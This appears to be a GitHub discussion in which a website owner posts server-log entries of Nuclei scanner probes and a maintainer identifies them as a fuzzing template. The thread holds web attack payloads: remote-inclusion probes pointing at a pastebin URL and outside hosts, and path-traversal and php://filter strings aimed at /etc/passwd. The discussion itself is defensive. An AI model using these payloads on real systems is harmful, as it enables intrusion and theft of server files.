### DISCUSSION TITLE
Anyone can explain this command found in my .htaccess wordpress file? Thanks a lot!

### DISCUSSION THREAD

**Discussion by Investor20** [projectdiscovery/nuclei-templates#752] [Q&A] [answered]
GET /?cat=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&dir=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&action=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&board=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&date=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&detail=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&file=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&download=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&path=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&folder=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&prefix=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&include=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&page=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&inc=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&locate=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&show=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&doc=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&site=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&type=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&view=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&content=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&document=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&layout=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&mod=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55&conf=%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%47%45%75%43%34%68%31%55 HTTP/1.1" 301 162 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)

**Comment by ehsandeep** [comment, marked as answer]
Hi @Investor20, 

Most probably someone scanned your website using [following template](https://github.com/projectdiscovery/nuclei-templates/blob/master/fuzzing/generic-lfi-fuzzing.yaml).

```
      - "/?q=../../../etc/passwd&s=../../../etc/passwd&search=../../../etc/passwd&id=&action=../../../etc/passwd&keyword=../../../etc/passwd&query=../../../etc/passwd&page=../../../etc/passwd&keywords=../../../etc/passwd&url=../../../etc/passwd&view=../../../etc/passwd&cat=../../../etc/passwd&name=../../../etc/passwd&key=../../../etc/passwd&p=../../../etc/passwd"
      - "/?q=../../../etc/passwd%00&s=../../../etc/passwd%00&search=../../../etc/passwd%00&id=../../../etc/passwd%00&action=../../../etc/passwd%00&keyword=../../../etc/passwd%00&query=../../../etc/passwd%00&page=../../../etc/passwd%00&keywords=../../../etc/passwd%00&url=../../../etc/passwd%00&view=../../../etc/passwd%00&cat=../../../etc/passwd%00&name=../../../etc/passwd%00&key=../../../etc/passwd%00&p=../../../etc/passwd%00"
      - "/?q=%252e%252e%252fetc%252fpasswd&s=%252e%252e%252fetc%252fpasswd&search=%252e%252e%252fetc%252fpasswd&id=%252e%252e%252fetc%252fpasswd&action=%252e%252e%252fetc%252fpasswd&keyword=%252e%252e%252fetc%252fpasswd&query=%252e%252e%252fetc%252fpasswd&page=%252e%252e%252fetc%252fpasswd&keywords=%252e%252e%252fetc%252fpasswd&url=%252e%252e%252fetc%252fpasswd&view=%252e%252e%252fetc%252fpasswd&cat=%252e%252e%252fetc%252fpasswd&name=%252e%252e%252fetc%252fpasswd&key=%252e%252e%252fetc%252fpasswd&p=%252e%252e%252fetc%252fpasswd"
      - "/?q=%252e%252e%252fetc%252fpasswd%00&s=%252e%252e%252fetc%252fpasswd%00&search=%252e%252e%252fetc%252fpasswd%00&id=%252e%252e%252fetc%252fpasswd%00&action=%252e%252e%252fetc%252fpasswd%00&keyword=%252e%252e%252fetc%252fpasswd%00&query=%252e%252e%252fetc%252fpasswd%00&page=%252e%252e%252fetc%252fpasswd%00&keywords=%252e%252e%252fetc%252fpasswd%00&url=%252e%252e%252fetc%252fpasswd%00&view=%252e%252e%252fetc%252fpasswd%00&cat=%252e%252e%252fetc%252fpasswd%00&name=%252e%252e%252fetc%252fpasswd%00&key=%252e%252e%252fetc%252fpasswd%00&p=%252e%252e%252fetc%252fpasswd%00"
      - "/?q=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&s=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&search=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&id=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&action=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keyword=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&query=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keywords=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&url=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&view=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&cat=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&name=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&key=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&p=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
      - "/?q=....//....//etc/passwd&s=....//....//etc/passwd&search=....//....//etc/passwd&id=....//....//etc/passwd&action=....//....//etc/passwd&keyword=....//....//etc/passwd&query=....//....//etc/passwd&page=....//....//etc/passwd&keywords=....//....//etc/passwd&url=....//....//etc/passwd&view=....//....//etc/passwd&cat=....//....//etc/passwd&name=....//....//etc/passwd&key=....//....//etc/passwd&p=....//....//etc/passwd"
      - "/?q=..///////..////..//////etc/passwd&s=..///////..////..//////etc/passwd&search=..///////..////..//////etc/passwd&id=..///////..////..//////etc/passwd&action=..///////..////..//////etc/passwd&keyword=..///////..////..//////etc/passwd&query=..///////..////..//////etc/passwd&page=..///////..////..//////etc/passwd&keywords=..///////..////..//////etc/passwd&url=..///////..////..//////etc/passwd&view=..///////..////..//////etc/passwd&cat=..///////..////..//////etc/passwd&name=..///////..////..//////etc/passwd&key=..///////..////..//////etc/passwd&p=..///////..////..//////etc/passwd"
      - "/?q=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&s=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&search=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&id=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&action=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keyword=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&query=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keywords=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&url=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&view=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&cat=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&name=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&key=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&p=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
      - "/?q=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&s=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&search=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&id=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&action=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keyword=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&query=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keywords=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&url=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&view=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&cat=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&name=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&key=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&p=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd"
```

**Comment by Investor20** [comment]
Hi! Thanks  a lot for your answer! I just wondered in case a similar attempt was issued directly from your website or just applying the above template? Thanks once again for your time!

**Reply by ehsandeep** [reply]
Hey, no, we don't provide any cloud-based solutions yet, it's all coming from the project:- https://github.com/projectdiscovery/nuclei

**Comment by Investor20** [comment]
Thank you for your clarification! 

Wish you the best!

Sincerely,

**Comment by Investor20** [comment]
Hi once again!

I don't know whether I was clear the last time I reported the mentioned issue, but it keeps persisting. Once again, the code for hacking my  website is being used directly from your Github repository:

GET /?cat=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&dir=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&action=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&board=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&date=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&detail=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&file=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&download=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&path=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&folder=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&prefix=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&include=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&page=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&inc=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&locate=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&show=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&doc=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&site=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&type=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&view=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&content=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&document=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&layout=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&mod=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&conf=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&filename=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt HTTP/1.1" 301 162 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)


Hopefully a proper answer to my reporting!

**Comment by Investor20** [comment]
Hey silly people, this is a not a joke!!

79.176.63.217 auraelegance.com - [25/Jan/2021:20:02:41 +0000] "GET /?cat=%5c%5c52.28.163.189%5cauraelegance.com.txt&dir=%5c%5c52.28.163.189%5cauraelegance.com.txt&action=%5c%5c52.28.163.189%5cauraelegance.com.txt&board=%5c%5c52.28.163.189%5cauraelegance.com.txt&date=%5c%5c52.28.163.189%5cauraelegance.com.txt&detail=%5c%5c52.28.163.189%5cauraelegance.com.txt&file=%5c%5c52.28.163.189%5cauraelegance.com.txt&download=%5c%5c52.28.163.189%5cauraelegance.com.txt&path=%5c%5c52.28.163.189%5cauraelegance.com.txt&folder=%5c%5c52.28.163.189%5cauraelegance.com.txt&prefix=%5c%5c52.28.163.189%5cauraelegance.com.txt&include=%5c%5c52.28.163.189%5cauraelegance.com.txt&page=%5c%5c52.28.163.189%5cauraelegance.com.txt&inc=%5c%5c52.28.163.189%5cauraelegance.com.txt&locate=%5c%5c52.28.163.189%5cauraelegance.com.txt&show=%5c%5c52.28.163.189%5cauraelegance.com.txt&doc=%5c%5c52.28.163.189%5cauraelegance.com.txt&site=%5c%5c52.28.163.189%5cauraelegance.com.txt&type=%5c%5c52.28.163.189%5cauraelegance.com.txt&view=%5c%5c52.28.163.189%5cauraelegance.com.txt&content=%5c%5c52.28.163.189%5cauraelegance.com.txt&document=%5c%5c52.28.163.189%5cauraelegance.com.txt&layout=%5c%5c52.28.163.189%5cauraelegance.com.txt&mod=%5c%5c52.28.163.189%5cauraelegance.com.txt&conf=%5c%5c52.28.163.189%5cauraelegance.com.txt&filename=%5c%5c52.28.163.189%5cauraelegance.com.txt HTTP/1.1" 301 162 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)" | - | - - 0.000 - W NC:000000 UP:-
‮
79.176.63.217 auraelegance.com - [25/Jan/2021:20:01:57 +0000] "GET /?cat=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&dir=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&action=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&board=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&date=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&detail=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&file=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&download=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&path=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&folder=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&prefix=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&include=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&page=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&inc=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&locate=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&show=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&doc=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&site=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&type=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&view=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&content=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&document=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&layout=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&mod=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&conf=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&filename=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt HTTP/1.1" 301 162 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)" | - | - - 0.002 - W NC:000000 UP:-
‮
79.176.63.217 auraelegance.com - [25/Jan/2021:19:59:57 +0000] "GET /?cat=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&dir=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&action=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&board=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&date=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&detail=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&file=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&download=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&path=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&folder=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&prefix=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&include=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&page=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&inc=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&locate=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&show=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&doc=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&site=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&type=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&view=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&content=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&document=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&layout=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&mod=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&conf=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&filename=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt HTTP/1.1" 301 162 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)" | - | - - 0.000 - W NC:000000 UP:-
‮
79.176.63.217 auraelegance.com - [25/Jan/2021:19:59:53 +0000] "GET /?cat=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&dir=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&action=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&board=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&date=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&detail=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&file=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&download=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&path=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&folder=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&prefix=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&include=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&page=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&inc=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&locate=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&show=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&doc=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&site=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&type=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&view=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&content=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&document=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&layout=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&mod=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&conf=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt&filename=%5c%5c52.28.163.189%5c%5auraelegance.com%5ccd.txt HTTP/1.1" 301 162 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)" | - | - - 0.002 - W NC:000000 UP:-

**Reply by geeknik** [reply]
Looking at server logs will literally drive you mad, it's like staring into the abyss. I'd suggest spending some time setting up a WAF like Cloudflare or mod_security if you like tinkering, but set up a staging environment first and test out changes before you commit them to production. Employ secure coding practices and keep your server software up to date. Nginx is pretty rock solid out of the box. Otherwise, in all fairness, there isn't much you can do here except get upset things that are beyond our control. Our web server gets thousands upon thousands of brute force attempts from all over the world every day. Good luck out there!
